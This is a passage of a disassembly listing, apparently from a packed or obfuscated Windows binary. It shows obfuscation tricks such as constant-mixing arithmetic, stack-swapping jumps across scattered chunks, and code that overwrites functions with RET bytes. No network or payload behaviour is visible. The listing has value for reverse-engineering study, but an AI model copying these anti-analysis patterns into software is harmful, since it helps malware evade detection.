sub_458713	proc near		; CODE XREF: y2kk37jd:0044E7DBj
					; sub_45AFC4-30p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F06B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004437B8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044AF01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D4E SIZE 00000012 BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		pushf
		push	0D0A02669h
		jmp	loc_453D4E
sub_458713	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D5A6

loc_458722:				; CODE XREF: sub_44D5A6+Aj
		rol	eax, 19h
		test	eax, 10000000h
		jmp	loc_44593B
; END OF FUNCTION CHUNK	FOR sub_44D5A6
; ---------------------------------------------------------------------------
		jmp	ds:off_41E0A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_458736:				; CODE XREF: sub_4411C3-3A24j
					; sub_4411C3:loc_4422D3j ...
		jnb	loc_43D7A4
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_454D0F
		mov	eax, 0B4B93D2h
		call	sub_442C3E
		jmp	loc_43D790
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_458755:				; CODE XREF: sub_43EF4F+A6CBj
		or	ecx, 0AB1155B9h
		jnz	loc_44BA99

loc_458761:				; CODE XREF: y2kk37jd:loc_43DE35j
					; sub_455D37+10j
		jmp	nullsub_247
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_458766:				; CODE XREF: sub_446861+5ABDj
		jmp	loc_457490
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
		xchg	edi, [ebp+0]
		not	ecx
		jmp	loc_4584C0

; =============== S U B	R O U T	I N E =======================================



sub_458775	proc near		; CODE XREF: y2kk37jd:004428B6p
					; y2kk37jd:00450F65j
		xchg	edx, [esp+0]
		pop	edx
		pop	ecx
		pop	ebp
		retn
sub_458775	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45877C	proc near		; CODE XREF: sub_459158-1A5F1p
					; sub_454413+51F1p

; FUNCTION CHUNK AT 0044AFB0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456C60 SIZE 0000000B BYTES

		mov	eax, ds:dword_446608
		or	eax, eax
		jnz	loc_44C971
		jmp	loc_456C60
sub_45877C	endp

; ---------------------------------------------------------------------------
		jno	nullsub_158
		jmp	sub_4474A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_45879A:				; CODE XREF: sub_45B7AA-1A5B3j
		jg	loc_449075
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_43B4EE

loc_4587A0:				; CODE XREF: sub_43B4EE:loc_44F52Bj
		push	offset sub_450FE4
		jmp	loc_43F5B3
; END OF FUNCTION CHUNK	FOR sub_43B4EE

; =============== S U B	R O U T	I N E =======================================



sub_4587AA	proc near		; CODE XREF: sub_43BEDBp sub_4579F3+3j ...

; FUNCTION CHUNK AT 0044F054 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455277 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458C6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BCC9 SIZE 00000011 BYTES

		call	sub_4444CA

loc_4587AF:				; CODE XREF: y2kk37jd:004515AFj
		jmp	loc_455277
sub_4587AA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4587B4:				; CODE XREF: y2kk37jd:004409D3j
		jb	loc_444D25

; =============== S U B	R O U T	I N E =======================================



sub_4587BA	proc near		; CODE XREF: sub_441F30+A42Ap

; FUNCTION CHUNK AT 0043D0A5 SIZE 00000019 BYTES

		xchg	edi, [esp+0]
		pop	edi

loc_4587BE:				; CODE XREF: y2kk37jd:0044AA3Ej
		add	eax, 8CE4392h
		jmp	loc_43D0A5
sub_4587BA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	edx, 3E4997B4h
		jle	loc_43EE4A
		jmp	sub_4484F7
; ---------------------------------------------------------------------------
		mov	eax, 0DD1C4F2h
		call	sub_442C3E
		mov	ds:dword_41E164, eax
		lea	eax, nullsub_519

loc_4587F0:				; CODE XREF: y2kk37jd:loc_43B5A9j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_519
; ---------------------------------------------------------------------------

loc_4587F8:				; CODE XREF: y2kk37jd:0044D44Aj
		mov	eax, [esp]
		push	edx
		call	sub_43F618
		jmp	loc_44D5B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_458806:				; CODE XREF: sub_458FC0-FF9j
		mov	eax, ds:dword_446BD0
		or	eax, eax
		jnz	loc_446A42
		jmp	loc_4415D9
; END OF FUNCTION CHUNK	FOR sub_458FC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_458819:				; CODE XREF: sub_45380A:loc_4463D0j
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_440AE8
		call	sub_43CB6C

loc_45882A:				; CODE XREF: sub_4429DD-56A8j
		jmp	loc_44CEC6
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF31

loc_45882F:				; CODE XREF: sub_43CF31+Bj
		jmp	nullsub_249
; END OF FUNCTION CHUNK	FOR sub_43CF31

; =============== S U B	R O U T	I N E =======================================



sub_458834	proc near		; DATA XREF: sub_45C5C5o

; FUNCTION CHUNK AT 0043E24A SIZE 0000000A BYTES

		pop	edx
		jns	loc_43E24A
		mov	eax, [esp+0]
		call	sub_448C80
sub_458834	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_459AFA

loc_458843:				; CODE XREF: sub_459AFA+5j
		jmp	nullsub_293
; END OF FUNCTION CHUNK	FOR sub_459AFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459168

loc_458848:				; CODE XREF: sub_459168+16j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_459168
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460E8

loc_45884D:				; CODE XREF: sub_4460E8+DBB9j
		jmp	nullsub_383
; END OF FUNCTION CHUNK	FOR sub_4460E8

; =============== S U B	R O U T	I N E =======================================



sub_458852	proc near		; DATA XREF: y2kk37jd:0043D927o

; FUNCTION CHUNK AT 00459A57 SIZE 0000000D BYTES

		push	78634AAEh

loc_458857:				; CODE XREF: y2kk37jd:004513BEj
		pop	ebx
		rol	ebx, 16h
		sub	ebx, 1680F160h
		add	ebx, 42C613BAh
		rol	ebx, 0Eh
		add	ebx, 3176AC10h

loc_458870:				; CODE XREF: y2kk37jd:004544A4j
		jmp	loc_459A57
sub_458852	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	ecx, 1CF9EA43h
		jmp	loc_44594B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_458880:				; CODE XREF: sub_4492F7:loc_43E338j
		add	edx, 0E3970CEAh
		xchg	edx, [esp-4+arg_0]
		jmp	sub_4415B8
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------

loc_45888E:				; CODE XREF: y2kk37jd:0043D6F0j
		push	esi
		not	esi
		jmp	loc_450737
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45392D

loc_458896:				; CODE XREF: sub_45392D+2DE7j
		call	sub_440B7C

loc_45889B:				; CODE XREF: y2kk37jd:00446807j
		jmp	loc_451B12
; END OF FUNCTION CHUNK	FOR sub_45392D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_4588A0:				; CODE XREF: sub_43F346+74j
		jmp	nullsub_250
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
		db 81h,	0F0h, 82h
		dd 0E920384Ah, 0FFFF4033h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4588B0:				; CODE XREF: sub_448CAE:loc_45A1DEj
		lea	eax, sub_445787
		mov	byte ptr [eax],	0C3h

loc_4588B9:				; CODE XREF: y2kk37jd:loc_4436BBj
		jmp	sub_445787
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------

loc_4588BE:				; CODE XREF: y2kk37jd:0045ADB1j
		push	eax
		call	sub_442E78
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_4588C4:				; CODE XREF: sub_43BF31:loc_45751Fj
		test	eax, 1000h
		jmp	loc_43CFFB
; END OF FUNCTION CHUNK	FOR sub_43BF31
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_4588D0:				; CODE XREF: sub_455B08-33A9j
		jnz	loc_44411D
		jmp	loc_45AC1C
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------

loc_4588DB:				; CODE XREF: y2kk37jd:0045B687j
		mov	edi, ebp
		pop	ebp
		or	edi, 2976EEF4h
		add	edi, 77A3DDCEh
		sub	edi, 54E44192h
		add	edi, 0A002548Eh
		jmp	loc_4434DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445557

loc_4588FB:				; CODE XREF: sub_445557:loc_457192j
		pop	eax
		add	eax, 0DB0A5F43h
		xor	eax, 767B1CA0h
		xchg	eax, [esp+0]
		push	eax
		jmp	loc_445778
; END OF FUNCTION CHUNK	FOR sub_445557
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA8

loc_458911:				; CODE XREF: sub_453BA8:loc_43F0DFj
		test	eax, 400h
		jmp	loc_442F69
; END OF FUNCTION CHUNK	FOR sub_453BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_45891C:				; CODE XREF: sub_44CC31-7144j
					; sub_45B7AA:loc_44FBDFj
		jmp	loc_44CF56
; END OF FUNCTION CHUNK	FOR sub_44CC31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_458921:				; CODE XREF: y2kk37jd:0044507Ej
					; sub_45B7AA-EA11j ...
		push	eax
		push	1C0B09EBh
		pop	eax
		and	eax, 0EA277E64h
		xor	eax, 5A918F3Eh
		add	eax, 0ADB24315h
		jmp	loc_45300E
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------

loc_45893F:				; CODE XREF: y2kk37jd:0045AE73j
		xor	eax, ebx
; START	OF FUNCTION CHUNK FOR sub_445226

loc_458941:				; CODE XREF: sub_445226:loc_444C1Bj
		rol	eax, 0Ah
		xor	eax, 4D587782h
		add	eax, ebp
		add	eax, 0F11DC418h
		popf
		push	eax
		jmp	sub_446C4E
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E2D

loc_458959:				; CODE XREF: sub_447E2D:loc_43BEE6j
		push	ecx
		push	0FE990515h
		pop	ecx
		rol	ecx, 5
		jmp	loc_458BBD
; END OF FUNCTION CHUNK	FOR sub_447E2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_458968:				; CODE XREF: sub_4408B9+2CE7j
		or	eax, eax
		jnz	loc_451409
		jmp	loc_4562DA
; END OF FUNCTION CHUNK	FOR sub_4408B9

; =============== S U B	R O U T	I N E =======================================



sub_458975	proc near		; DATA XREF: sub_452441+2A6o
		lea	eax, sub_452441
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C505
sub_458975	endp


; =============== S U B	R O U T	I N E =======================================



sub_458983	proc near		; CODE XREF: sub_41A889+Cp
					; y2kk37jd:0045864Aj
					; DATA XREF: ...
		push	offset sub_454433
		jmp	nullsub_252
sub_458983	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_45898D:				; CODE XREF: sub_449E69+81CFj
		mov	eax, esi
		jno	sub_4420C5
		jp	loc_43E15F

loc_45899B:				; CODE XREF: sub_449E69:loc_443653j
		movzx	eax, word ptr [ebp-6]
		jmp	loc_445E77
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------

loc_4589A4:				; CODE XREF: y2kk37jd:00444057j
		and	esi, 0A4E0F6CDh
		rol	esi, 1
		test	esi, 10000000h
		jmp	loc_457EE8

; =============== S U B	R O U T	I N E =======================================



sub_4589B7	proc near		; CODE XREF: sub_43ED86+8CDDj
					; sub_4512BD+3p ...

; FUNCTION CHUNK AT 0043F13E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445B17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F14 SIZE 0000001A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0]
		jmp	loc_445B17
sub_4589B7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444CA

loc_4589C6:				; CODE XREF: sub_4444CA:loc_459E23j
		xor	edx, 0F708F13Ah
		add	edx, 5584063Ch
		xchg	edx, [esp-4+arg_0]
		jmp	sub_4599BE
; END OF FUNCTION CHUNK	FOR sub_4444CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC3F

loc_4589DA:				; CODE XREF: sub_45BC3F:loc_45AFBCj
		cdq
		adc	ebx, eax
		and	esi, 6EF07336h
		xchg	ebx, edx
		jmp	loc_4452FA
; END OF FUNCTION CHUNK	FOR sub_45BC3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_4589EA:				; CODE XREF: sub_43C46D:loc_43B9D9j
		xor	eax, 1018343Dh
		add	eax, ebp
		add	eax, 0FFF6F370h
		mov	eax, [eax]
		push	edx
		push	eax
		pop	edx
		xchg	edx, [esp+4+var_4]
		jmp	loc_445F1A
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_458A05:				; CODE XREF: sub_443360-16CAj
		jno	loc_44ED9C

loc_458A0B:				; CODE XREF: sub_443360:loc_44DD30j
		call	sub_45405E
		mov	edx, 0BE8CE1B7h
		call	sub_440CD1
		mov	[ebp-4], eax
		jmp	loc_43B5C1
; END OF FUNCTION CHUNK	FOR sub_443360
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_458A23:				; CODE XREF: sub_454413:loc_453C2Fj
		pushf
		jmp	loc_453083
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_43C4ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_458A2F:				; CODE XREF: sub_449C4F+4E4Ej
		test	ebp, ecx
		jmp	loc_442CA1
; END OF FUNCTION CHUNK	FOR sub_449C4F

; =============== S U B	R O U T	I N E =======================================



sub_458A36	proc near		; CODE XREF: sub_452224+Cj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441330 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442728 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444F9F SIZE 00000005 BYTES

		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_4516D8
		jmp	loc_444F9F
sub_458A36	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_458A4A:				; CODE XREF: sub_4411C3+15DCBj
		rol	esi, 19h
		or	ebp, 7A8BF421h

loc_458A53:				; CODE XREF: sub_4411C3:loc_43CCE4j
		mov	eax, [esp+4+var_4]
		push	eax
		push	edi
		jmp	loc_4407A9
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_458A5D:				; CODE XREF: sub_44B814+6EF8j
		mov	ebx, [ebp+0]
		jns	loc_4591C3
		shr	ecx, 17h
		xor	eax, 8EC3A232h
		jmp	loc_442403
; END OF FUNCTION CHUNK	FOR sub_44B814

; =============== S U B	R O U T	I N E =======================================



sub_458A74	proc near		; CODE XREF: y2kk37jd:004559E0j
					; sub_43E03C:loc_4598CCp

; FUNCTION CHUNK AT 0043B889 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D52A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447D1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448DA1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C867 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456405 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	8CA83176h
		pop	eax
		or	eax, 0CEDA9611h
		add	eax, 3352A959h
		add	eax, ebp
		jmp	loc_447D1F
sub_458A74	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_458A91:				; CODE XREF: y2kk37jd:0045722Ej
		ror	edx, 12h

loc_458A94:				; CODE XREF: y2kk37jd:loc_45721Bj
		and	eax, ds:4000F3h
		rol	eax, 1Ah
		add	eax, 6D7FCFB4h
		call	sub_442C3E
		jmp	loc_45312D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_458AAD:				; CODE XREF: sub_4486E1-8C9Dj
		xor	eax, 0A60776C7h
		add	eax, ebp

loc_458AB5:				; CODE XREF: y2kk37jd:loc_440253j
		add	eax, 9BC8CC05h
		mov	eax, [eax]
		push	ecx
		pushf
		push	0D5B1770Eh
		jmp	loc_44189E
; END OF FUNCTION CHUNK	FOR sub_4486E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B0A5

loc_458AC9:				; CODE XREF: sub_45B0A5-D926j
		mov	edx, [ecx]
		adc	edi, 0EF0E1E61h
		adc	esi, ecx
		jmp	loc_450981
; END OF FUNCTION CHUNK	FOR sub_45B0A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_458AD8:				; CODE XREF: sub_4504DD:loc_4427C5j
		xor	esi, 13E02BE2h
		add	esi, ebp
		add	esi, 8B5033DFh
		mov	[esi], edx
		push	offset loc_447D89
		jmp	loc_43D93E
; END OF FUNCTION CHUNK	FOR sub_4504DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_458AF2:				; CODE XREF: sub_4429DD:loc_448616j
					; DATA XREF: sub_44CDD5:loc_44B9F9o
		xchg	edi, [esp+0]
		mov	esi, eax
		xchg	esi, [esp+0]
		push	esi
		jmp	loc_44E5B9
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_458B00:				; CODE XREF: sub_456990:loc_45B88Ej
		xor	ebx, 0A65DB1C0h
		pushf
		jmp	loc_44E70F
; END OF FUNCTION CHUNK	FOR sub_456990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_458B0C:				; CODE XREF: sub_44F641+6BD0j
		jnz	loc_458C7A
		jmp	loc_45A7BC
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_458B17:				; CODE XREF: sub_44D3D0:loc_44242Dj
		jge	loc_43E1A3

loc_458B1D:				; CODE XREF: sub_4578A6-692Bj
		jmp	loc_44F8DE
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_458B22:				; CODE XREF: sub_443360+BA58j
		jmp	loc_440FBD
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------

loc_458B27:				; CODE XREF: y2kk37jd:0044DC58j
		jmp	loc_43DC58
; ---------------------------------------------------------------------------
		xchg	edx, [ebp+0]
		mov	ebx, 0A552E375h
		jmp	loc_43E19D
; ---------------------------------------------------------------------------

locret_458B39:				; CODE XREF: y2kk37jd:00447F62j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_458B3A:				; CODE XREF: sub_448DCA+B2C9j
		jmp	loc_43BAB5
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------

loc_458B3F:				; CODE XREF: y2kk37jd:0044FB02j
		jmp	nullsub_181
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_458B44:				; CODE XREF: sub_4466E0+5E88j
		jz	loc_444D10
		jmp	loc_457547
; END OF FUNCTION CHUNK	FOR sub_4466E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_458B4F:				; CODE XREF: sub_445226+1F7j
		jp	loc_44F1CC
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_458B55	proc near		; CODE XREF: y2kk37jd:0045415Ep
		xchg	ecx, [esp+0]
		pop	ecx
		mov	edx, ecx
		call	sub_44EDF8
sub_458B55	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_458B60:				; CODE XREF: sub_4448E2+E92Cj
		jmp	loc_44E2CC
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_458B65:				; CODE XREF: sub_445226+5DF9j
		jmp	loc_4549B3
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ebx, 0FACA27DDh
		jmp	loc_44CF36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A326

loc_458B74:				; CODE XREF: sub_44A326+10j
		jz	loc_43BB02
		jmp	loc_43C5CA
; END OF FUNCTION CHUNK	FOR sub_44A326
; ---------------------------------------------------------------------------
		or	ebx, edi
		jmp	loc_44D6A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_458B86:				; CODE XREF: sub_43F770:loc_44B709j
		push	offset sub_440AA5
		jmp	loc_446285
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_458B90:				; CODE XREF: sub_44201B+B103j
		mov	eax, [ebp-4]
		mov	al, [eax]
		sub	al, 99h
		push	0FC04F4D2h

loc_458B9C:				; CODE XREF: y2kk37jd:0043EDB5j
		pop	edx
		xor	edx, 1B10D616h
		jmp	loc_45B824
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------

loc_458BA8:				; CODE XREF: y2kk37jd:loc_4571C4j
		jnz	loc_45BD89
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_458BAE:				; CODE XREF: sub_45689F-13BBj
		jmp	sub_454539
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		rol	ecx, 1Ah
		mov	[esi], edi
		jmp	loc_4545A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E2D

loc_458BBD:				; CODE XREF: sub_447E2D+10B36j
		or	ecx, 29DBC65Ch
		rol	ecx, 0Bh
		add	ecx, 210C2B75h
		xchg	ecx, [esp+14h+var_14]
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_447E2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D1BD

loc_458BD4:				; CODE XREF: sub_43D1BD:loc_449E16j
		rol	eax, 12h

loc_458BD7:				; CODE XREF: sub_4411C3:loc_4406ECj
		and	eax, 9ADF816Ch
		cmp	eax, 0BE132251h
		jmp	loc_440F39
; END OF FUNCTION CHUNK	FOR sub_43D1BD
; ---------------------------------------------------------------------------
		cmp	esi, ebx
		jmp	loc_442555
; ---------------------------------------------------------------------------
		jmp	loc_44E215
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_458BF4:				; CODE XREF: y2kk37jd:00449F6Ej
					; sub_456A36+18j ...
		jnb	loc_44EE77
		test	eax, 2
		jz	loc_457EF2
		jmp	loc_45AA41
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_458C0A:				; CODE XREF: sub_4490B4:loc_4529A3j
		push	0AFE51BFDh
		pop	ecx
		rol	ecx, 14h
		or	ecx, 7BCA3D0Bh
		jnz	loc_450DC7
; END OF FUNCTION CHUNK	FOR sub_4490B4
; START	OF FUNCTION CHUNK FOR sub_45433F

loc_458C1F:				; CODE XREF: sub_45433F+7j
		jmp	sub_4464B3
; END OF FUNCTION CHUNK	FOR sub_45433F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423DA

loc_458C24:				; CODE XREF: sub_4423DA+Aj
		jmp	loc_43D3AD
; END OF FUNCTION CHUNK	FOR sub_4423DA
; ---------------------------------------------------------------------------

loc_458C29:				; CODE XREF: y2kk37jd:00442FF8j
		mov	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_458C2B	proc near		; CODE XREF: sub_44A33C+7p

; FUNCTION CHUNK AT 0044F061 SIZE 00000003 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, 3Ch
		mov	eax, [eax]
		jmp	loc_44F061
sub_458C2B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D005

loc_458C39:				; CODE XREF: sub_43D005:loc_449701j
		push	0E2B8F23Dh
		pop	edx
		and	edx, 0FF301924h
		xor	edx, 3C702916h
		add	edx, 2203BAEFh
		xchg	edx, [esp+4+var_4]
		jmp	sub_45ADEC
; END OF FUNCTION CHUNK	FOR sub_43D005

; =============== S U B	R O U T	I N E =======================================



sub_458C59	proc near		; CODE XREF: y2kk37jd:0044DB26j
					; sub_453F01+9p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	ds:off_41E100, eax
		lea	eax, sub_447F91
		mov	byte ptr [eax],	0C3h
sub_458C59	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4587AA

loc_458C6C:				; CODE XREF: sub_4587AA:loc_44F054j
		jmp	sub_447F91
; END OF FUNCTION CHUNK	FOR sub_4587AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_458C71:				; CODE XREF: sub_44F641-1225Bj
		sbb	edx, ebp
		sub	ecx, ebp
; END OF FUNCTION CHUNK	FOR sub_44F641
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_458C75:				; CODE XREF: sub_44C4BC:loc_44339Ej
					; sub_44C4BC-8BF8j ...
		jmp	loc_4488A7
; ---------------------------------------------------------------------------

loc_458C7A:				; CODE XREF: sub_44C4BC:loc_44D0E6j
					; sub_44F641:loc_458B0Cj
		xchg	ebx, [esp+0]
		mov	ecx, ebx
		pop	ebx
		xchg	esi, [esp-4+arg_0]
		jmp	loc_448B01
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_458C89:				; CODE XREF: sub_4562E5-DEA9j
		jmp	loc_455BEF
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------

loc_458C8E:				; CODE XREF: y2kk37jd:0044F442j
		xchg	edi, ebx
		popf
; START	OF FUNCTION CHUNK FOR sub_45A05D

loc_458C91:				; CODE XREF: sub_45A05D-AC36j
		xor	esi, 86C78929h
		add	esi, 8295A098h
		xchg	esi, [esp+0Ch+var_C]
		jmp	sub_4459CC
; END OF FUNCTION CHUNK	FOR sub_45A05D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_458CA5:				; CODE XREF: sub_43B0F5:loc_43F80Cj
		cmp	byte ptr [eax],	0
		jnz	loc_454053
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		jmp	loc_45C359
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4559A7

loc_458CB9:				; CODE XREF: sub_4559A7+Ej
		jz	loc_454013
; END OF FUNCTION CHUNK	FOR sub_4559A7
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_458CBF:				; CODE XREF: sub_44F3F5:loc_44C0ABj
		jmp	loc_45116B
; END OF FUNCTION CHUNK	FOR sub_44F3F5

; =============== S U B	R O U T	I N E =======================================



sub_458CC4	proc near		; DATA XREF: sub_449F5B+F8E7o

; FUNCTION CHUNK AT 00448301 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457010 SIZE 00000002 BYTES

		push	347A74B6h
		pop	edx
		and	edx, 0AFE033BAh
		add	edx, 0DBE44282h
		mov	[edx], eax
		jmp	loc_448301
sub_458CC4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

